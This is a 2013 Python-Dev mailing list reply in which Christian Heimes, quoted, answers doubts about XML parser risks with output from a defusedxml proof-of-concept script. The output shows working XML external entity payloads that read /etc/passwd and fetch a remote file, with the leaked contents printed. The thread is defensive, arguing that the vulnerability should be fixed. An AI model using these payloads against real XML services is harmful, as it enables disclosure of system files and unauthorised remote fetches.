Reminds me of the encoding attacks that were possible in earlier versions of Python... you could have e.g. an email processing script run the Python test suite by simply sending a specially crafted email :-)
On 21.02.2013 13:04, Christian Heimes wrote: > Am 21.02.2013 11:32, schrieb Antoine Pitrou: >> You haven't proved that these were actual threats, nor how they >> actually worked. I'm gonna remain skeptical if there isn't anything >> more precise than "It highly depends on the parser and the application >> what kind of exploit is possible". > > https://bitbucket.org/tiran/defusedxml/src/82f4037464418bf11ea734969b7ca1c193e6ed91/other/python-external.py?at=default > > $ ./python-external.py > > REQUEST: > -------- > <weather>Aachen</weather> > > RESPONSE: > --------- > <weather>The weather in Aachen is terrible.</weather > > > REQUEST: > -------- > <?xml version="1.0" encoding="utf-8"?> > <!DOCTYPE weather [ > <!ENTITY passwd SYSTEM "file:///etc/passwd"> > ]> > <weather>&passwd;</weather> > > > RESPONSE: > --------- > <error>Unknown city root:x:0:0:root:/root:/bin/bash > daemon:x:1:1:daemon:/usr/sbin:/bin/sh > bin:x:2:2:bin:/bin:/bin/sh > sys:x:3:3:sys:/dev:/bin/sh > sync:x:4:65534:sync:/bin:/bin/sync > games:x:5:60:games:/usr/games:/bin/sh > man:x:6:12:man:/var/cache/man:/bin/sh > lp:x:7:7:lp:/var/spool/lpd:/bin/sh > mail:x:8:8:mail:/var/mail:/bin/sh > news:x:9:9:news:/var/spool/news:/bin/sh > uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh > proxy:x:13:13:proxy:/bin:/bin/sh > www-data:x:33:33:www-data:/var/www:/bin/sh > backup:x:34:34:backup:/var/backups:/bi</error> > > > REQUEST: > -------- > <?xml version="1.0" encoding="utf-8"?> > <!DOCTYPE weather [ > <!ENTITY url SYSTEM > "http://hg.python.org/cpython/raw-file/a11ddd687a0b/Lib/test/dh512.pem";> > ]> > <weather>&url;</weather> > > > RESPONSE: > --------- > <error>Unknown city -----BEGIN DH PARAMETERS----- > MEYCQQD1Kv884bEpQBgRjXyEpwpy1obEAxnIByl6ypUM2Zafq9AKUJsCRtMIPWak > XUGfnHy9iUsiGSa6q6Jew1XpKgVfAgEC > -----END DH PARAMETERS----- > > These are the 512 bit DH parameters from "Assigned Number for SKIP > Protocols" > (http://www.skip-vpn.org/spec/numbers.html). > See there for how they were generated. > Note that g is not a generator, but this is not a problem since p is a > safe prime. > </error> > > > Q.E.D. > Christian > _______________________________________________ > Python-Dev mailing list > [email protected] > http://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: > http://mail.python.org/mailman/options/python-dev/mal%40egenix.com > -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Feb 24 2013) >>> Python Projects, Consulting and Support ... http://www.egenix.com/ >>> mxODBC.Zope/Plone.Database.Adapter ... http://zope.egenix.com/ >>> mxODBC, mxDateTime, mxTextTools ... http://python.egenix.com/ ________________________________________________________________________ ::::: Try our mxODBC.Connect Python Database Interface for free ! :::::: eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ _______________________________________________ Python-Dev mailing list [email protected] http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com